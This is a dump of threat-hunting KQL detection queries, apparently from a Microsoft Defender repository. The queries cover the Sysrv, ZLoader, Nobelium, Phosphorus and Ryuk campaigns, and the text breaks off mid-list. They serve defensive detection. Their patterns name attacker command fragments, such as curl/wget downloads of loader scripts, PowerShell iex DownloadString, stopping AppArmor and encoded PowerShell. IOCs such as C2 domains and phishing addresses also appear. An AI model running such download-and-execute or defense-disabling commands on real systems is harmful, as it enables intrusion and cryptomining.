Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Sysrv-botnet/app-armor-stopped.md ================================================ # AppArmor service stopped This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of the attacker attempting to stop the AppArmor network security service on devices running Linux. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessCommandLine has "/bin/bash /tmp/" and ProcessCommandLine has "service apparmor stop" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | v | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/java-executing-cmd-to-run-powershell.md ================================================ # Java process executing command line to download and execute PowerShell script This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of the Java process being used to execute cmd.exe, and download and execute a PowerShell script. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessFileName == 'java.exe' and FileName == 'cmd.exe' and ProcessCommandLine has_all('powershell iex','DownloadString') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/kinsing-miner-download.md ================================================ # Kinsing miner download This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances where the attacker commanded the Kinsing miner file to be downloaded on Linux devices. ## Query ```kusto DeviceProcessEvents | where ProcessCommandLine has_all('curl', '-o /etc/kinsing') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | v | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/oracle-webLogic-executing-powershell.md ================================================ # Oracle WebLogic process wlsvcX64.exe exploitation and execution of PowerShell script to download payloads This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of Oracle WebLogic being exploited to run a PowerShell script that downloads payloads. ## Query ```kusto union DeviceProcessEvents, DeviceFileEvents | where InitiatingProcessParentFileName =~ 'wlsvcX64.exe' and InitiatingProcessFileName =~ 'powershell.exe' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/rce-on-vulnerable-server.md ================================================ # Remote code execution on vulnerable server This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of remote code execution on a vulnerable Linux server. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessCommandLine has "php-cgi.exe" | where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | v | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Sysrv-botnet/tomcat-8-executing-powershell.md ================================================ # Tomcat 8 process executing PowerShell command line to perform data exploitation activities and setting up scheduler tasks. This query was originally published in the threat analytics report, *Sysrv botnet evolution*. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency. The following query finds instances of Apache Tomcat 8 being exploited to execute encoded PowerShell commands. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessParentFileName startswith 'tomcat' | where InitiatingProcessFileName in~("cmd.exe", "powershell.exe") and InitiatingProcessCommandLine hasprefix '-enc ' and ProcessCommandLine has_any ('cmd.exe','powershell.exe','sc.exe','schtasks.exe','WMIC.exe') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. Technique, tactic, or state | Covered? (v=yes) | Notes -|-|- Initial access | | Execution | v | Persistence | | Privilege escalation | | Defense evasion | v | Credential Access | | Discovery | | Lateral movement | | Collection | | Command and control | | Exfiltration | | Impact | | Vulnerability | | Exploit | | Misconfiguration | | Malware, component | | Ransomware | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Threat actor Phosphorus masquerading as conference organizers.md ================================================ # Threat actor Phosphorus masquerading as conference organizers Identify prior activity from this campaign using IOCs shared by Microsoft’s Threat Intelligence Center, or MSTIC. Read more: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ ## Query ``` //All emails from the threat actor Phosphorus, masquerading as conference organizers, based on the IOCs shared // by Microsoft’s Threat Intelligence Center in: https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/ let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",   "munichconference@outlook.de", "munichconference1962@gmail.com"]); EmailEvents | where SenderFromAddress in~ (MaliciousSenders) //Filter for emails that were delivered check the FinalEmailAction to see if there was policy applied on this email let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",   "munichconference@outlook.de", "munichconference1962@gmail.com"]); EmailEvents | where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered" //Filter for emails that were delivered and check if there was any action taken on them post delivery, by joining with EmailPostDeliveryEvents let MaliciousSenders = dynamic(["t20saudiarabia@outlook.sa", "t20saudiarabia@hotmail.com", "t20saudiarabia@gmail.com", "munichconference@outlook.com",   "munichconference@outlook.de", "munichconference1962@gmail.com"]); EmailEvents | where SenderFromAddress in~ (MaliciousSenders) and DeliveryAction == "Delivered" | join EmailPostDeliveryEvents on NetworkMessageId, RecipientEmailAddress ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | V | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Tali Ash **GitHub alias:** tali-ash **Organization:** Microsoft **Contact info:** @Taliash1 ================================================ FILE: Campaigns/WastedLocker Downloader.md ================================================ # WastedLocker Downloader This query identifies the launch pattern associated with wastedlocker ransomware. Reference writeup: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us ## Query ``` DeviceProcessEvents | where InitiatingProcessFileName =~ 'wscript.exe' and FileName =~ 'powershell.exe' and InitiatingProcessCommandLine matches regex @"(?i)\\chrome\.update\..+?\.js" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution |v| | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Michael Melone **GitHub alias:** mjmelone **Organization:** Microsoft **Contact info:** @PowershellPoet ================================================ FILE: Campaigns/ZLoader/Malicious bat file.md ================================================ # Malicious .bat file in suspicious Oracle Java SE folder path ZLoader was delivered in a campaign in late summer 2021. This campaign was tweeted by @MsftSecIntel on twitter. ## Query This query looks for the suspicious .bat file placed in the folder using a specific naming convention purporting to be Java-related. ``` DeviceFileEvents | where FileName endswith '.bat' and FolderPath has @'Program Files (x86)\Sun Technology Network\Oracle Java SE' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/ZLoader/Payload Delivery.md ================================================ # Tim.exe payload delivery ZLoader was delivered in a campaign in summer 2021 via malvertising. This campaign was tweeted about by @MsftSecIntel on twitter. ## Query This query looks for delivery of the malicious payload, Tim.exe. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ 'powershell.exe' and InitiatingProcessCommandLine has('Invoke-WebRequest') and InitiatingProcessCommandLine endswith '-OutFile tim.EXE' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/ZLoader/Suspicious Registry Keys.md ================================================ # Suspicious Registry Keys ZLoader was delivered in a campaign in late summer 2021 using malvertising to download malicious .msi files onto affected machines. This campaign was originally tweeted by @MsftSecIntel on Twitter. In this campaign, the malicious .msi files create registry keys that use that attacker-created comapny names. ## Query This query looks for the suspicious registry keys created by the attacker-created companies. ``` DeviceRegistryEvents | where RegistryValueData in('Flyintellect Inc.', 'Datalyst ou') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/apt sofacy zebrocy.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy_zebrocy.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine endswith "cmd.exe /c SYSTEMINFO & TASKLIST" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt sofacy.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_sofacy.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dat",' or ProcessCommandLine matches regex @'rundll32\.exe %APPDATA%.*\.dll",#1' | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt ta17 293a ps.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_ta17_293a_ps.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine =~ "ps.exe -accepteula" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt tropictrooper.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_tropictrooper.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc" | top 100 by Timestamp desc ================================================ FILE: Campaigns/apt unidentified nov 18.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_unidentified_nov_18.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine endswith "cyzfc.dat, PointFunctionCall" | top 100 by Timestamp desc DeviceFileEvents | where Timestamp > ago(7d) | where FolderPath has "ds7002.lnk" | top 100 by Timestamp desc ================================================ FILE: Campaigns/c2-lookup-from-nonbrowser[Nobelium].md ================================================ # Locate Nobelium implant receiving DNS response This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceEvents | where ActionType == "DnsQueryResponse" //DNS Query Response and AdditionalFields has ".avsvmcloud" IdentityQueryEvents | where ActionType == "DNS query" | where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com" | project Timestamp, QueryTarget, DeviceName ,IPAddress,ReportId ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/c2-lookup-response[Nobelium].md ================================================ # Locate Nobelium implant receiving DNS response This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query detects events when Nobelium received a DNS response after launching a lookup request to known command-and-control infrastructure. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceEvents | where ActionType == "DnsQueryResponse" //DNS Query Response and AdditionalFields has ".avsvmcloud" IdentityQueryEvents | where ActionType == "DNS query" | where QueryTarget has "appsync-api" or QueryTarget has "avsvmcloud.com" | project Timestamp, QueryTarget, DeviceName, IPAddress, ReportId ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/cobalt-strike-invoked-w-wmi.md ================================================ # Detect Cobalt Strike invoked via WMI This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/). [Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot. During the earliest stages of a Ryuk infection, an operator downloads [Cobalt Strike](https://www.cobaltstrike.com/), a penetration testing kit that is also used by malicious actors. Cobalt Strike is used by Ryuk operators to explore the network before deploying the Ryuk payload. This malicious behavior is often obscured by Base64 encoding and other tricks. The following query detects possible invocation of Cobalt Strike using [Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/wmi-start-page) (WMI). The [See also](#See-also) section below lists links to other queries associated with Ryuk ransomware. ## Query ```Kusto // Find use of Base64 encoded PowerShell // Indicating possible Cobalt Strike DeviceProcessEvents | where Timestamp > ago(7d) // Only WMI-initiated instances, remove to broaden scope | where InitiatingProcessFileName =~ 'wmiprvse.exe' | where FileName =~ 'powershell.exe' and (ProcessCommandLine hasprefix '-e' or ProcessCommandLine contains 'frombase64') // Check for Base64 with regex | where ProcessCommandLine matches regex '[A-Za-z0-9+/]{50,}[=]{0,2}' // Exclusions: The above regex may trigger false positive on legitimate SCCM activities. // Remove this exclusion to search more broadly. | where ProcessCommandLine !has 'Windows\\CCM\\' | project DeviceId, Timestamp, InitiatingProcessId, InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md) * [Detect credential theft via SAM database export by LaZagne](../Credential%20Access/lazagne.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/compromised-certificate[Nobelium].md ================================================ # Compromised certificate [Nobelium] Search for the files that are using a compromised certificate associated with the Nobelium campaign. You can remove the comments to: * get the list of devices where there is at least one file signed with the certificate * get the list of files signed with the certificate * get the list of files signed with the certificate group by Devices ## Query ```Kusto DeviceFileCertificateInfo | where Signer == 'Solarwinds Worldwide, LLC' and SignerHash == '47d92d49e6f7f296260da1af355f941eb25360c4' | join DeviceFileEvents on SHA1 | distinct DeviceName, FileName, FolderPath, SHA1, SHA256, IsTrusted, IsRootSignerMicrosoft, SignerHash //| distinct DeviceName //| distinct FileName //| summarize mylist = make_list(FileName) by DeviceName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly 